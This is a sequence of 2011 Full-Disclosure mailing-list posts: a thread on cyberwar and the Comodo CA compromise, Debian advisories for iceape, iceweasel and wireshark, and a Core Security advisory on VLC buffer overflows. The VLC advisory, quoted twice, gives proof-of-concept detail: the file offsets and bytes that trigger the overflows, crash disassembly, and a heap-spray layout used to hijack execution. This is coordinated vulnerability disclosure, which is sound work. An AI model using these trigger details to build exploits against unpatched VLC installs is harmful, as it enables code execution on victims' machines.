On Wed, Mar 23, 2011 at 12:22 PM, imipak imi...@gmail.com wrote: ... *cough* http://blogs.comodo.com/it-security/data-security/the-recent-ca-compromise/ re: The IP address of the initial attack was recorded and has been determined to be assigned to an ISP in Iran. A web survey revealed one of the certificates deployed on another IP address assigned to an Iranian ISP. The server in question stopped responding to requests shortly after the certificate was revoked While the involvement of two IP addresses assigned to Iranian ISPs is suggestive of an origin, this may be the result of an attacker attempting to lay a false trail. iran is pretty incompetent in most information technology respects. odds strongly favor pwn hops through their unmonitored, unmaintained, unhardened, sloppy conglomerations of servers and switches...* and, i suppose we can add RSA to the thread: http://www.schneier.com/blog/archives/2011/03/rsa_security_in.html although any time someone blames ADVANCED persistent threat i like to recall fondly the Aleatory threat, https://media.blackhat.com/bh-us-10/presentations/Waisman/BlackHat-USA-2010-Waisman-APT-slides.pdf if you've been lazy on infosec, opsec for a while without calamity by sheer luck, this is definitely the year your luck will run out. lazy == pwned * like all generalizations this is false. , in whole yet frequently true in parts. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0208: VLC Vulnerabilities handling .AMV and .NSV files
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies - Corelabs Advisory http://corelabs.coresecurity.com/ VLC Vulnerabilities handling .AMV and .NSV files 1. *Advisory Information* Title: VLC Vulnerabilities handling .AMV and .NSV files Advisory ID: CORE-2011-0208 Advisory URL: http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files Date published: 2011-03-23 Date of last update: 2011-03-23 Vendors contacted: VLC team Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119] Impact: Code execution Remotely Exploitable: Yes (client-side) Locally Exploitable: No CVE Name: CVE-2010-3275, CVE-2010-3276 3. *Vulnerability Description* Two vulnerabilities have been found in VLC media player [1], when handling .AMV and .NSV file formats. These vulnerabilities can be exploited by a remote attacker to obtain arbitrary code execution with the privileges of the user running VLC. 4. *Vulnerable packages* . VLC 1.1.4 . VLC 1.1.5 . VLC 1.1.6 . VLC 1.1.7 . Older versions may be affected, but were not checked. 5. *Non-vulnerable packages* . VLC 1.1.8 6. *Vendor Information, Solutions and Workarounds* These vulnerabilities are fixed in VLC version 1.1.8, which can be downloaded from http://www.videolan.org/ 7. *Credits* These vulnerabilities were discovered and researched by Ricardo Narvaja from Core Security Technologies. Publication was coordinated by Carlos Sarraute. 8. *Technical Description / Proof of Concept Code* 8.1. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling AMV files [CVE-2010-3275]* This vulnerability was found by fuzzing different formats. In AMV files if the offset 0x41 is changed to a value greater than 90 as shown below: /- Offset(h) 52 49 46 46 00 00 00 00 41 4D 56 20 4C 49 53 54 RIFFAMV LIST 0010 00 00 00 00 68 64 72 6C 61 6D 76 68 38 00 00 00 hdrlamvh8... 0020 24 F4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $ô.. 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0040 A0 A0 - -/ Then the program will crash in the following plugin: /- Executable modules, item 248 Base=6D68 Size=00017000 (94208.) Entry=6D6810C0 libdir_1.ModuleEntryPoint Name=libdir_1 Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll - -/ More precisely in this location: /- 6D6812A18B10MOV EDX,DWORD PTR DS:[EAX] 6D6812A3894C24 04 MOV DWORD PTR SS:[ESP+4],ECX 6D6812A7890424 MOV DWORD PTR SS:[ESP],EAX 6D6812AAFF92 8000 CALL DWORD PTR DS:[EDX+80] offset 06A18B10MOV EDX,DWORD PTR DS:[EAX] 06A3894C24 04 MOV DWORD PTR SS:[ESP+4],ECX 06A7890424 MOV DWORD PTR SS:[ESP],EAX 06AAFF92 8000 CALL DWORD PTR DS:[EDX+80] registers EAX 3DD1255C ECX EDX 3032344A EBX 3DDF9410 ESP 3F82FC04 EBP 3DD1229C ESI 3DD1255C EDI 3DDF90BC EIP 6D6812AA libdir_1.6D6812AA - -/ When executing an appropriate heap spray in Internet explorer: /- 303234CA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 303234DA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 303234EA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 303234FA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 3032350A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 3032351A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 3032352A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C - -/ We manage to take control of the execution flow and execute our code: /- 0C0C0C0C0C 0C OR AL,0C 0C0C0C0E0C 0C OR AL,0C 0C0C0C100C 0C OR AL,0C 0C0C0C120C 0C OR AL,0C 0C0C0C140C 0C OR AL,0C 0C0C0C160C 0C OR AL,0C 0C0C0C180C 0C OR AL,0C 0C0C0C1A0C 0C OR AL,0C 0C0C0C1C0C 0C OR AL,0C 0C0C0C1E0C 0C OR AL,0C 0C0C0C200C 0C OR AL,0C 0C0C0C220C 0C OR AL,0C 0C0C0C240C 0C OR AL,0C 0C0C0C260C 0C OR AL,0C - -/ 8.2. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling NSV files [CVE-2010-3276]* In NSV files when changing the offsets 0x0b to 0x0e as shown below: /- Offset(h) 4E 53 56 73 56 50 33 31 4D 50 33 98 00 99 01 01 NSVsVP31MP3_._.. - -/ We can make the program crash in the following plugin: /- Executable modules, item 248 Base=6D68 Size=00017000 (94208.) Entry=6D6810C0 libdir_1.ModuleEntryPoint Name=libdir_1 Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll - -/ More precisely in this location: /- 6D6812A18B10MOV EDX,DWORD PTR DS:[EAX] 6D6812A3894C24 04 MOV DWORD PTR SS:[ESP+4],ECX 6D6812A7
[Full-disclosure] [SECURITY] [DSA 2199-1] iceape security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2199-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff March 23, 2011 http://www.debian.org/security/faq - - Package: iceape Vulnerability : none in iceape Problem type : none in iceape Debian-specific: no CVE ID : not available This update for the Iceape internet suite, an unbranded version of Seamonkey, updates the certificate blacklist for several fraudulent HTTPS certificates. More details can be found in a blog posting by Jacob Appelbaum of the Tor project: https://blog.torproject.org/category/tags/ssl-tls-ca-tor-certificates-torbrowser The oldstable distribution (lenny) is not affected. The iceape package only provides the XPCOM code. For the stable distribution (squeeze), this problem has been fixed in version 2.0.11-4. For the unstable distribution (sid), this problem has been fixed in version 2.0.13-1. We recommend that you upgrade your iceape packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk2KW5cACgkQXm3vHE4uylo0AQCgnWxJzIs6SUjXuhhHuJvFRVPA GsEAnR30DuJBPIDHD2yWGqx2hDcBRgxV =2v7I -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2200-1] iceweasel security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2200-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff March 23, 2011 http://www.debian.org/security/faq - - Package: iceweasel Vulnerability : none in iceweasel Problem type : none in iceweasel Debian-specific: no CVE ID : not available This update for Iceweasel, a web browser based on Firefox, updates the certificate blacklist for several fraudulent HTTPS certificates. More details can be found in a blog posting by Jacob Appelbaum of the Tor project: https://blog.torproject.org/category/tags/ssl-tls-ca-tor-certificates-torbrowser For the oldstable distribution (lenny), this problem has been fixed in version 1.9.0.19-9 of the xulrunner source package. For the stable distribution (squeeze), this problem has been fixed in version 3.5.16-6. For the unstable distribution (sid), this problem has been fixed in version 3.5.18-1. For the experimental distribution, this problem has been fixed in version 4.0~rc2-1. We recommend that you upgrade your iceweasel packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk2KXjwACgkQXm3vHE4uylrljgCgxyjj11P46OhefLrw8A7B3A6v HVgAn2y4vZH4H6UB88wB6x6NqeQ7J+Mj =ZoU0 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2201-1] wireshark security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2201-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff March 23, 2011 http://www.debian.org/security/faq - - Package: wireshark Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-0538 CVE-2011-0713 CVE-2011-1139 CVE-2011-1140 CVE-2011-1141 Huzaifa Sidhpurwala, Joernchen, and Xiaopeng Zhang discovered several vulnerabilities in the Wireshark network traffic analyzer. Vulnerabilities in the DCT3, LDAP and SMB dissectors and in the code to parse pcag-ng files could lead to denial of service or the execution of arbitrary code. For the oldstable distribution (lenny), this problem has been fixed in version 1.0.2-3+lenny13. For the stable distribution (squeeze), this problem has been fixed in version 1.2.11-6+squeeze1 For the unstable distribution (sid), this problem has been fixed in version 1.4.4-1. We recommend that you upgrade your wireshark packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk2KaxwACgkQXm3vHE4uylpBkgCfabAzulwiyFi/phmPHYyU7Nxm 47sAn03CFpWP+fJ6n3SSbZ9EAwHyjagF =DTar -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CORE-2011-0208: VLC Vulnerabilities handling .AMV and .NSV files
Hmm...well, this is one vulnerability, not two, and it was fixed in VLC's tree on February 12. Still a nice find. -Dan On Wed, Mar 23, 2011 at 4:34 PM, CORE Security Technologies Advisories advisor...@coresecurity.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies - Corelabs Advisory http://corelabs.coresecurity.com/ VLC Vulnerabilities handling .AMV and .NSV files 1. *Advisory Information* Title: VLC Vulnerabilities handling .AMV and .NSV files Advisory ID: CORE-2011-0208 Advisory URL: http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files Date published: 2011-03-23 Date of last update: 2011-03-23 Vendors contacted: VLC team Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119] Impact: Code execution Remotely Exploitable: Yes (client-side) Locally Exploitable: No CVE Name: CVE-2010-3275, CVE-2010-3276 3. *Vulnerability Description* Two vulnerabilities have been found in VLC media player [1], when handling .AMV and .NSV file formats. These vulnerabilities can be exploited by a remote attacker to obtain arbitrary code execution with the privileges of the user running VLC. 4. *Vulnerable packages* . VLC 1.1.4 . VLC 1.1.5 . VLC 1.1.6 . VLC 1.1.7 . Older versions may be affected, but were not checked. 5. *Non-vulnerable packages* . VLC 1.1.8 6. *Vendor Information, Solutions and Workarounds* These vulnerabilities are fixed in VLC version 1.1.8, which can be downloaded from http://www.videolan.org/ 7. *Credits* These vulnerabilities were discovered and researched by Ricardo Narvaja from Core Security Technologies. Publication was coordinated by Carlos Sarraute. 8. *Technical Description / Proof of Concept Code* 8.1. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling AMV files [CVE-2010-3275]* This vulnerability was found by fuzzing different formats. In AMV files if the offset 0x41 is changed to a value greater than 90 as shown below: /- Offset(h) 52 49 46 46 00 00 00 00 41 4D 56 20 4C 49 53 54 RIFFAMV LIST 0010 00 00 00 00 68 64 72 6C 61 6D 76 68 38 00 00 00 hdrlamvh8... 0020 24 F4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $ô.. 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0040 A0 A0 - -/ Then the program will crash in the following plugin: /- Executable modules, item 248 Base=6D68 Size=00017000 (94208.) Entry=6D6810C0 libdir_1.ModuleEntryPoint Name=libdir_1 Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll - -/ More precisely in this location: /- 6D6812A1 8B10 MOV EDX,DWORD PTR DS:[EAX] 6D6812A3 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX 6D6812A7 890424 MOV DWORD PTR SS:[ESP],EAX 6D6812AA FF92 8000 CALL DWORD PTR DS:[EDX+80] offset 06A1 8B10 MOV EDX,DWORD PTR DS:[EAX] 06A3 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX 06A7 890424 MOV DWORD PTR SS:[ESP],EAX 06AA FF92 8000 CALL DWORD PTR DS:[EDX+80] registers EAX 3DD1255C ECX EDX 3032344A EBX 3DDF9410 ESP 3F82FC04 EBP 3DD1229C ESI 3DD1255C EDI 3DDF90BC EIP 6D6812AA libdir_1.6D6812AA - -/ When executing an appropriate heap spray in Internet explorer: /- 303234CA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 303234DA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 303234EA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 303234FA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 3032350A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 3032351A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 3032352A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C - -/ We manage to take control of the execution flow and execute our code: /- 0C0C0C0C 0C 0C OR AL,0C 0C0C0C0E 0C 0C OR AL,0C 0C0C0C10 0C 0C OR AL,0C 0C0C0C12 0C 0C OR AL,0C 0C0C0C14 0C 0C OR AL,0C 0C0C0C16 0C 0C OR AL,0C 0C0C0C18 0C 0C OR AL,0C 0C0C0C1A 0C 0C OR AL,0C 0C0C0C1C 0C 0C OR AL,0C 0C0C0C1E 0C 0C OR AL,0C 0C0C0C20 0C 0C OR AL,0C 0C0C0C22 0C 0C OR AL,0C 0C0C0C24 0C 0C OR AL,0C 0C0C0C26 0C 0C OR AL,0C - -/ 8.2. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling NSV files [CVE-2010-3276]* In NSV files when changing the offsets 0x0b to 0x0e as shown below: /- Offset(h) 4E 53 56 73 56 50 33 31 4D 50 33 98 00 99 01 01 NSVsVP31MP3_._.. - -/ We can make the program crash in the following plugin: /- Executable modules, item 248
Re: [Full-disclosure] Materials regarding Cyber-war
By the way, if you have kernel sources installed mainly, interesting stuff appears when you grep warfare as root: # grep --recursive --ignore-case -s warfare / including some SPACE NAVAL WARFARE SYSTEMS' drivers' information and all. Oh, and espionage is a part of the thing, not a distinct subject. Regards, On Wed, Mar 23, 2011 at 5:33 PM, coderman coder...@gmail.com wrote: On Wed, Mar 23, 2011 at 12:22 PM, imipak imi...@gmail.com wrote: ... *cough* http://blogs.comodo.com/it-security/data-security/the-recent-ca-compromise/ re: The IP address of the initial attack was recorded and has been determined to be assigned to an ISP in Iran. A web survey revealed one of the certificates deployed on another IP address assigned to an Iranian ISP. The server in question stopped responding to requests shortly after the certificate was revoked While the involvement of two IP addresses assigned to Iranian ISPs is suggestive of an origin, this may be the result of an attacker attempting to lay a false trail. iran is pretty incompetent in most information technology respects. odds strongly favor pwn hops through their unmonitored, unmaintained, unhardened, sloppy conglomerations of servers and switches...* and, i suppose we can add RSA to the thread: http://www.schneier.com/blog/archives/2011/03/rsa_security_in.html although any time someone blames ADVANCED persistent threat i like to recall fondly the Aleatory threat, https://media.blackhat.com/bh-us-10/presentations/Waisman/BlackHat-USA-2010-Waisman-APT-slides.pdf if you've been lazy on infosec, opsec for a while without calamity by sheer luck, this is definitely the year your luck will run out. lazy == pwned * like all generalizations this is false. , in whole yet frequently true in parts. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Marcio Barbado, Jr. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Materials regarding Cyber-war
On Mar 23, 2011, at 12:22 PM, imipak wrote: On 14 March 2011 17:24, bk cho...@gmail.com wrote: On Mar 14, 2011, at 10:04 AM, imipak wrote: On 14/03/11 16:51, bk wrote: The point you missed is that almost all the examples we've seen so far have been closer to espionage than to actual warfare. [...] Despite that, I agree. Espionage != War. People hyping cyberwar are either trying to increase their sales, budget, or jurisdiction. Report: Iran's paramilitary launches cyber attack http://www.google.com/hostednews/ap/article/ALeqM5jlwiVKEhlj8CjRz6dzR-McTlnRHw -i Yes, let's put a lot of stock in propaganda that amounts to we're in ur hostin providerz, defacin ur websitez. This is from the same regime that photoshopped in extra missiles to make their capabilities look stronger. Grow up. *cough* http://blogs.comodo.com/it-security/data-security/the-recent-ca-compromise/ -i Spying on your own citizens is considered cyberwar now? That's *if* (and it's a big if), we actually believe it was an attack sponsored by the Iranian state. -- chort ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
